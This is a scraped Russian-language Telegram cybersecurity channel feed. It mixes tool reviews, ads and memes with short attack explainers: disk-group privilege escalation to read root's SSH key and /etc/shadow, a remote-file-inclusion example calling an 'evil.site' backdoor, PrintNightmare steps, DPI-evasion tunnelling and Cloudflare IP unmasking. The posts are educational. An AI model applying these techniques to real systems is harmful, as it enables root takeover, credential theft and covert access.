Мир сегодня с "Юрий Подоляка"
Мир сегодня с "Юрий Подоляка"
Труха⚡️Україна
Труха⚡️Україна
Николаевский Ванёк
Николаевский Ванёк
Мир сегодня с "Юрий Подоляка"
Мир сегодня с "Юрий Подоляка"
Труха⚡️Україна
Труха⚡️Україна
Николаевский Ванёк
Николаевский Ванёк
ZeroDay | Кибербезопасность
ZeroDay | Кибербезопасность
Date range
Number of views

Citations

Posts
Hide reposts
22.04.202513:09
Argus: Крутая разведка с Python

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

Что это такое: Argus — это универсальный recon-инструмент, заточенный под сбор информации о сетях, веб-приложениях и системах безопасности. Под капотом — удобный интерфейс, куча встроенных модулей и гибкая архитектура. Всё, что нужно, чтобы начать разведку — в одном месте.

Чем крут: Он отлично подходит как для быстрого сканирования, так и для глубокого анализа. Вывод читаемый, результаты — сразу готовы к работе. Работает гибко, не перегружен, легко настраивается под стиль конкретного специалиста.

ZeroDay | #Инструмент
Shift Left Security: думаем о безопасности с первого дня

👋 Приветствую в мире цифровой безопасности!

Сегодня расскажу не про уязвимость, а про подход, который помогает их избежать - Shift Left Security.

Что это вообще такое: это не инструмент и не фреймворк, а идея — внедрять практики безопасности на самых ранних стадиях разработки. Не после деплоя, не когда баг уже в проде, а прямо на этапе написания кода, проектирования, коммитов и CI/CD.

Как это работает:
1️⃣Разработчики проверяют безопасность кода до ревью — например, с помощью SAST (анализ кода).
2️⃣Тесты безопасности запускаются в CI/CD как обязательный этап.
3️⃣Принципы безопасности учитываются уже при проектировании архитектуры.
4️⃣Dev и Sec работают вместе: никакой “передачки” задач на тестеров и админов.
5️⃣Любой pull request — это потенциальная проверка на баги и уязвимости.

Чем пользоваться: Инструменты типа Snyk, SonarQube, Checkov — всё, что можно встроить в CI/CD. Плюс GitHub Actions, Git hooks и постоянное моделирование угроз.

ZeroDay | #безопасность
16.04.202516:39
Повышение привилегий через группу disk в Linux

👋 Приветствую в мире цифровой безопасности!

Сегодня разберем довольно недооцененную технику эскалации прав в Linux — через группу disk.

В чем суть: Если юзер состоит в группе disk, он может взаимодействовать с устройствами хранения — в частности, с основным диском /dev/sda. Это значит, что он может читать (а иногда и писать!) в файловую систему напрямую — например, достать id_rsa root-пользователя.

Сценарий атаки на пальцах:

1️⃣Создаем пользователя raj и добавляем его в элитную группу disk:

adduser raj  


2️⃣Включаем SSH-доступ для root (не забудьте про PermitRootLogin yes и PubkeyAuthentication yes).

3️⃣Подключаемся как raj, проверяем диск и открываем debugfs:

debugfs /dev/sda3  


4️⃣Копируем приватный ключ, даем ему нужные права и входим в систему уже как root:

chmod 600 id_rsa  


5️⃣Дальше по вкусу: читаем /etc/shadow, выкачиваем хэши, устраиваем барбекю.

Почему это реально опасно: Это не баг, это фича, которой можно злоупотребить. Особенно если кто-то случайно или по глупости добавил пользователя в disk. А на обычных десктопах или в dev-средах это бывает вполне себе часто.

ZeroDay | #атака
Вебинар для всех, кто работает с персональными данными

8 апреля в 16:00 Selectel проведет вебинар, где разберут:
- как компаниям, которые обрабатывают персональные данные, соответствовать 152-ФЗ,
- кто определяет уровень защищенности компании и как его проверить самостоятельно.

По итогам вебинара участникам отправят чек-лист вопросов для облачного провайдера по требованиям 152-ФЗ.

Мероприятие бесплатное. Посмотреть программу и зарегистрироваться можно по ссылке: https://slc.tl/3fr4c

Чтобы не пропустить вебинар и узнавать о других митапах, воркшопах и бесплатных курсах Selectel, подписывайтесь на @selectel_events

Реклама. АО “Селектел”, ИНН: 7810962785. ERID: 2Vtzqv6d3ig
Редтимим мониторинг: рекон Grafana

Grafana — это не простой инструмент для анализа данных, а порой и уязвимая точка входа в корпоративную сеть. Получив доступ, хакеры могут обойти защиту и расширить атаку в сети. А это уже неприятно, да? 🙄

⏺В статье рассказано, как использовали Grafana для сканирования портов, SSRF-атак и обхода авторизации с помощью брутфорса.

ZeroDay | #Статья
Fastflux: как быстро уходить от блокировок?

👋 Приветствую в мире цифровой безопасности!

Расскажу, как работает Fast Flux.

Что такое Fast Flux: это техника, которую используют хакеры, скрывая свои вредоносные серверы, постоянно меняя их IP-адреса. И да, этот способ делает их сайты и ботнеты сложными для обнаружения и блокировки.

3 столпа, на которых держится fastflux

1️⃣Частая смена IP-адресов — суть метода в том, что DNS-записи обновляются буквально каждую минуту, что делает сайт или сервер трудноуловимым.
2️⃣Сеть заражённых устройств — вместо одного сервера злоумышленники используют целую армию заражённых машин, которые перенаправляют трафик, маскируя источник атаки.
3️⃣Двухуровневый Fast Flux — это более сложная версия, в которой не только конечные серверы, но и промежуточные узлы меняют IP-адреса, создавая почти невидимую инфраструктуру.

Как вы поняли, Fast Flux делает блокировку вредоносных сайтов ну сильно запарнее — как только заблокирован один IP, хакеры тут же переключают трафик на новый.

Как защититься: Начнем с анализа DNS-записей и трафика на необычные изменения. Ну и не забываем подключать методы блокировки, которые учитывают поведение сети — они помогут быстрее поймать кого нужно.

ZeroDay | #fastflux
Расследование: как фальшивые DNS-записи крадут ваши данные, а вы и не замечаете

Вы вводите URL любимого сайта, но попадаете на его идеальную копию, созданную мошенниками. Что, если DNS-система работает против вас? Подмены записей, отравление кэша и атаки через MITM — все это может привести к краже ваших данных: от паролей до криптокошельков.

⏺В статье — детальное разъяснение того, как хакеры юзают уязвимости в DNS для кражи данных, а также как можно защититься от подобных атак и избежать фишинга.

ZeroDay | #Статья
18.04.202511:01
Открыли прием заявок на Pentest award 2025!

Это отраслевая награда для специалистов по тестированию на проникновение, которую ежегодно вручает компания Авилликс. Основная задача премии — выделить лучших специалистов и показать их вклад в развитие российского пентеста.

Участие в премии бесплатное, прием заявок продлиться до 30 июня.

🏆Главный приз за победу — стеклянная именная статуэтка, макбук и максимальный почет сообщества этичных хакеров.
🏅За вторые и третьи места призеры получат айфоны и смарт-часы.
⚡️Также будут подарки от партнеров проекта: Совкомбанк Технологии и BIZONE Bug Bounty, гранты от учебного центра CyberEd и билеты на конференцию OFFZONЕ. Церемония награждения будет проходить 1 августа в Москве.

Заявка на премию — это рассказ о лучшем проекте в свободной форме. Не нужно раскрывать эксплоиты, любые шаги в цепочке эксплуатации могут быть полностью анонимны, а детали могут быть скрыты, важно отразить сам подход и идею.

Подать заявку и узнать больше информации можно на сайте — https://award.awillix.ru/

Реклама. ООО «Авилликс». erid:2VtzqwqwHdt
Reposted from:
Codeby avatar
Codeby
Друзья, уже сегодня в 19:00 по МСК пройдет бесплатный вебинар, где мы разберем, как обычный планшет или смартфон можно превратить в мощный инструмент для пентеста!

Что будет на вебинаре?
🔴 Покажем, как развернуть Kali Linux/Nethunter и использовать его для реальных задач.

Спикер: Андрей Бирюков
🌟 CISSP, 15+ лет в ИБ
🌟 Руководитель защиты АСУ ТП
🌟 Автор 4 книг и 200+ статей по кибербезопасности

Сегодня в 19:00 по МСК — бонусы для всех участников. 🔴 Регистрируйтесь здесь и получите ссылку на эфир и подарок в ответном письме.

🚀 По всем вопросам пишите @Codeby_Academy
01.04.202515:40
Расширенная маскировка трафика: ESNI, V2Ray и Covert Channels
Часть 2

👋 Приветствую в мире цифровой безопасности!

Сегодня разберем, как усилить маскировку с помощью ESNI, V2Ray и скрытых каналов передачи данных.


ESNI против SNI-фильтрации: Когда подключаетесь к сайту по HTTPS, провайдер все равно видит домен через SNI (Server Name Indication). Так можно легко заблокировать целые сайты, даже если у вас VPN или прокси.

И тут Encrypted SNI (ESNI) решает проблему, зашифровывая эту информацию. На Cloudflare ESNI включается прямо в браузере:
• Открываем about:config в Firefox
• Ищем network.security.esni.enabled
• Ставим true

V2Ray: превращаем трафик в обычный веб: Shadowsocks хорош, но его можно обнаружить. V2Ray позволяет маскировать соединения, превращая их в обычные HTTP-запросы.

Устанавливаем V2Ray на сервер:

bash <(curl -L https://install.direct/go.sh)


Настраиваем config.json:

{


Covert Channels: передача данных в неожиданных местах: Что если DPI фильтрует вообще все, кроме разрешенного трафика? Можно передавать данные там, где их ну точно не ждут:

1️⃣ICMP туннелинг (DNSCat2) — прячем трафик в пингах
2️⃣DNS туннелинг (iodine) — передаем данные через DNS-запросы
3️⃣HTTP(S) covert channel — запаковываем полезную нагрузку в GET/POST-запросы

Пример ICMP-туннеля:

sudo apt install iodine


На клиенте:

iodine -f 10.0.0.1 mydomain.com


ZeroDay | #маскировкатрафика
😈ТОП 3 канала для тех, кто увлекается хакингом и ИБ:

Этичный Хакеркрупнейший в СНГ канал по информационной безопасности.

Архив Безопасника — полезные github-инструменты для пентеста, сетевой разведки, xss, криптографии.

Не хакинг, а ИБ — канал для хакеров, которые не хотят попасть за решетку. OSINT, CTF, пентест, социальная инженерия.
25.03.202515:00
Настройка фаервола в Windows через PowerShell

👋 Приветствую в мире цифровой безопасности!

Сегодня поговорим о том, как можно настроить фаервол в Windows через PowerShell

Встроенный фаервол — это удобный инструмент для блокировки нежеланных соединений. Но вдруг хотите более точной настройки, тогда и можно использовать PowerShell и его модуль NetSecurity. Он дает доступ вообще ко всем возможностям брандмауэра, от создания новых правил до их удаления.

Запуск модуля NetSecurity: Чтобы приступить к настройке, нужно сначала подключить модуль NetSecurity:

Import-Module -Name 'NetSecurity'


Смотрим текущие правила: сейчас, когда уже модуль подключен, давайте узнаем, какие правила уже стоят в системе. Для этого используем команду:

Get-NetFirewallRule | Select-Object DisplayName, Enabled, Direction, Action -First 10


И вот вам обзор: сколько правил, какие включены, какой трафик блокируется. Если захотите подробности по каждому правилу, можно получить все параметры:

Get-NetFirewallRule | Select-Object * -First 1


Создаем новое правило: Теперь сделаем реально полезную штуку — заблокируем WINS. Для этого создаем правило, которое блокирует входящий трафик:

$Params = @{ 


Изменяем существующее правило: Если захотите поменять действие у уже настроенного правила, например, разрешить WINS, используем команду:

$Params = @{


Вот теперь WINS снова работает.

Удаляем ненужные правила: Если старое правило вам больше не нужно, удаляем его:

Remove-NetFirewallRule -DisplayName "Block WINS"


Удаление сразу нескольких правил: Еще один лайфхак — удалить несколько правил сразу. Например, все отключенные правила:

Remove-NetFirewallRule -Enabled 'False'


ZeroDay | #firewall #powershell
19.04.202511:30
- Наверное, он думает о других женщинах

- Я закрыл ту zero-day уязвимость или это мне приснилось?

ZeroDay | #мем
📝 Как работает Remote File Inclusion (RFI)

Всё начинается с безобидного параметра в URL — сайт хочет подключить нужную страницу. Но он же может подключить чужую, вместо своей 🧐

⏺Веб-приложение получает запрос вроде: ?page=about.php — и просто включает указанный файл.

Но фильтрации нет. И теперь можно подставить ссылку на внешний файл: ?page=https://evil.site/backdoor.php

⏺Сервер, ничего не подозревая, скачивает внешний PHP-файл и исполняет его как часть своего кода.

Этот код может делать всё: красть данные, открывать удалённый доступ, ставить бекдоры — потому что он запускается от имени сервера.

⏺Пока юзер думает, что пользуется сайтом — на сервере уже работает чужой сценарий.

ZeroDay | #атака
PrintNightmare: неприятная уязвимость в Windows

👋 Приветствую в мире цифровой безопасности!

Сегодня поговорим про уязвимость PrintNightmare.

PrintNightmare — уязвимость в службе Print Spooler в Windows, которая может привести к удалённому выполнению кода на вашем устройстве. Да, это именно та служба, что управляет задачами на печать, и её уязвимость открывает доступ по сути ко всей вашей системе. Звучит страшно, верно?😦

Как это работает?
1️⃣Хакер настраивает SMB-соединение с уязвимой системой и выполняет RPC-запросы.
2️⃣После этого он добавляет вредоносный драйвер, который содержит ссылку на DLL-библиотеку.
3️⃣Windows загружает эту библиотеку, предоставляя хакеру доступ к системе.

В чем опасность: Print Spooler, как мы уже обсудили, играет супер важную роль в работе системы, а её уязвимость позволяет обходить многие защиты. Патчи и обновления — это, конечно, важно, но эта опасность все же продолжает оставаться на горизонте, и новые способы атак могут быть уже на подходе.

ZeroDay | #fastflux
Reposted from:
Codeby avatar
Codeby
📣 БЕСПЛАТНЫЙ ВЕБИНАР WAPT & SQLiM: взламываем веб как профессионалы

Настоящий пентест — это не только сканеры, но и глубокий анализ, ручная эксплуатация и работа с эксплоитами. Покажем на практике, как это делают эксперты!

Ждем вас 3 апреля 19:00 (МСК). Регистрация здесь.

Что разберём:
🔸 Поиск уязвимостей через фаззинг
🔸 Реальные SQL- и командные инъекции (с выводом RCE)
🔸 Эскалация привилегий после взлома
🔸 Разбор похожих задач из курсов WAPT и SQLiM

Бонусы для участников:
✅ Доступ к записи
✅ Чек-лист "ТОП-5 ошибок в пентесте веба"
✅ Подарок для всех зрителей!

Спикер: Александр Медведев 😎
🔴 OSWE, OSCP, CWAPT, SQLIM и др., 3х-кратный победитель Standoff
🔴 Опыт в пентестах — 12+ лет

🚀 Трудности с регистрацией? Пишите @Codeby_Academy
Бюджет в кибербезе и масштабы проблем 😂

ZeroDay | #мем
🚩Ищите красные флаги — и это не про отношения
 
Selectel подготовил CTF-задачи для специалистов по кибербезопасности и предлагает вам решить их. Вы потренируете не только навыки криптографии и разработки, но и почувствуете себя настоящим детективом, ведь некоторые задачи закручены хитроумнее, чем преступления в книгах Агаты Кристи.
 
🔎 Шпионские штучки
Наконец, вам удалось перехватить трафик, в котором должен быть ключ к адресу одной секретной службы. Вы почти у цели, осталось разобрать дамп и следовать верным маршрутом.
 
🔎 Приглашение на ИБ-вечеринку
Специалисты по ИБ закатили праздник, но без специального ключа на него не попасть. Отыщите этот ключ, пока веселье еще в разгаре!
 
🔎 Тир на открытом воздухе
Звучит заманчиво, но только не в ветреную погоду. Попробуйте выстрелить точно в яблочко, чтобы получить награду.
 
Для каждой задачи уже готово решение, так что можно сразу проверить себя.
 
Реклама. АО “Селектел”, ИНН: 7810962785. ERID: 2VtzqvmPPVA
18.04.202515:30
🎉 Результаты розыгрыша:

🏆 Победители:
1. ivanterner (@ivanterner)
2. Len4r | ᏀᏒᎬᎻ (@undertaker_gpt)
3. Andrei (@a_vasiukou)
4. Ivan (@Lord_Voron)

✔️Проверить результаты
Весенний релиз Staffcop Enterprise 5.6

Когда?
🕓 24 апреля в 11:00 мск обсудим обновления продукта, которые упрощают расследования и защищают данные в новых сценариях.

Что будет?
— Покажем, как защититься от утечек через фотографирование экрана.
— Расскажем, как эффективно использовать Staffcop в связке с Контур.Доступом для оперативного реагирования и более глубокого расследования инцидентов.
— Продемонстрируем обновление краулера для поиска и работы с файлами на компьютерах сотрудников.

Для кого?
⚡️Вебинар будет полезен как непосредственным пользователям системы, так и всем, кто заинтересован в обеспечении информационной безопасности в организации.

Ждем вас на вебинаре, чтобы узнать о развитии продукта и задать вопросы спикерам.

➡️ Зарегистрироваться

Реклама. ООО «АТОМ БЕЗОПАСНОСТЬ», ИНН 5408298569, ОГРН 1125476195459 erid:2SDnjdHupfn
04.04.202508:00
Обзор рынка информационной безопасности за 2024 год 🛡

«Инфосистемы Джет» представила результаты обзора рынка информационной безопасности. Рынок кибербезопасности в России находится на этапе динамичного развития, ориентированного на обеспечение реальной защищенности бизнес-процессов и непрерывности бизнеса. В обзоре указаны направления, которые пользуются наибольшим спросом, а также продемонстрирована динамика этого спроса.

➡️ Основные выводы и ключевые цифры — в карточках, а полную версию обзора можно найти здесь.
31.03.202510:00
CloudFail: как обойти защиту Cloudflare и раскрыть скрытые IP

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

CloudFail — ну это прямо подарок для пентестеров. Он использует старые БД и уязвимые DNS-записи, чтобы выявить реальные IP, скрытые за защитой Cloudflare. И да, всё это делается через Tor, так что с анонимностью все ок 🤫

Как работает:
1️⃣Ищет уязвимости в DNS-записях через DNSDumpster.
2️⃣Проверяет IP-адреса в базе Crimeflare — это утечка старых данных.
3️⃣Перебирает более 2500 субдоменов, используя метод брутфорса.

Что нового: В форке исправлены старые ошибки с API, добавлена возможность генерировать отчёты и выводить IP в удобном списке.

ZeroDay | #Инструмент
28.03.202514:00
Маскирование трафика с Cloudflare, DNS over HTTPS (DoH) и Shadowsocks

👋 Приветствую в мире цифровой безопасности!

Сегодня разберем, как можно замаскировать трафик при Red Team-операциях и не только.


Зачем это нужно: Если ваш трафик мониторится Deep Packet Inspection (DPI) или ограничивается провайдерами, то стандартные VPN и прокси могут не сработать. DoH + Shadowsocks помогают скрывать трафик, обходить блокировки и не палиться.

Включаем DoH (DNS over HTTPS): Чтобы скрыть DNS-запросы от провайдера и DPI, включаем DoH с серверами Cloudflare (1.1.1.1). Проверяем, поддерживает ли система DoH:

resolvectl status


Настраиваем Cloudflare DoH в systemd-resolved:

sudo nano /etc/systemd/resolved.conf


Добавляем:

[Resolve]
DNS=1.1.1.1#cloudflare-dns.com
FallbackDNS=1.0.0.1#cloudflare-dns.com
DNSOverTLS=yes


Применяем настройки:

sudo systemctl restart systemd-resolved


Поднимаем Shadowsocks и тем самым скрываем реальный трафик. Shadowsocks не просто шифрует трафик — он делает его похожим на обычный HTTPS, обходя DPI. Устанавливаем сервер Shadowsocks:

sudo apt install shadowsocks-libev


Открываем конфиг /etc/shadowsocks-libev/config.json:

{


Запускаем сервер:

sudo systemctl start shadowsocks-libev


Скрываем IP за Cloudflare: Теперь трафик зашифрован, но IP-сервер все еще виден. Тут нужен cloudflare. Сначала добавляем домен в Cloudflare и включаем Proxy Mode. И далее активируем Argo Tunnel, чтобы трафик шел через Cloudflare без прямого IP-соединения:

cloudflared tunnel create my-tunnel
cloudflared tunnel route dns my-tunnel mydomain.com
cloudflared tunnel run my-tunnel


ZeroDay | #redteam #маскировкатрафика
25.03.202510:00
AlterX: Быстро генерируем субдомены для пентеста

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

Что это такое: AlterX — настоящий мастхэв для пентестеров и ИБшников. Он использует умные шаблоны и переменные, чтобы создавать списки субдоменов, которые реально работают. Убираем всякие неактуальные домены и увеличиваем шанс на реальный результат.

Как это работает: вы задаете шаблоны с переменными типа {{sub}}, {{suffix}} и {{tld}}, а AlterX генерирует вам все возможные комбинации, которые могут быть полезны. Хотите больше точности? Просто подгоните шаблон под свой проект.

Зачем вам AlterX: если вы делитесь своими шаблонами с командой или работаете на нескольких проектах, то AlterX позволит легко и быстро создавать словари для субдоменов. И, что важно, вы точно будете проверять то, что действительно существует.

И 3 крутые фишки от меня:
• Мгновенные и точные пермутации с кастомными паттернами
• Использует переменные как в Nuclei, чтобы сделать словари умными
• Обогащение словарей за секунду и гибкая настройка

ZeroDay | #Инструмент
Shown 1 - 24 of 32
Log in to unlock more functionality.